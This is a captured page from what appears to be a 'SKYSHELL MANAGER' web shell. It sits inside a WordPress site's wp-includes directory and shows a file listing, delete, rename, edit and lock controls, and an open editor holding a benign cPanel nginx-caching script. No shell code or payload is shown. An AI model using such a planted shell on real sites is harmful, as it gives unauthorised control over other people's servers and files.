📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: nginxService.min.js
define(["angular","cjt/io/api","cjt/io/uapi-request","cjt/io/uapi","cjt/services/APICatcher"],(function(i,e,n,a){"use strict";i.module("cpanel.tools.service.nginxService",[]).factory("nginxService",["$q","APICatcher",function(i,e){return{clearCache:function(){var i=new n.Class;return i.initialize("NginxCaching","clear_cache",{}),e.promise(i)},enableCaching:function(){var i=new n.Class;return i.initialize("NginxCaching","enable_cache",{}),e.promise(i)},disableCaching:function(){var i=new n.Class;return i.initialize("NginxCaching","disable_cache",{}),e.promise(i)}}}])}));
Save